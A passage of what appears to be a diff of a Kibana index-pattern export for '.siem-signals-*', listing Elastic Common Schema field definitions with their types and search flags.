,\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.2", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152853649, 1942], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\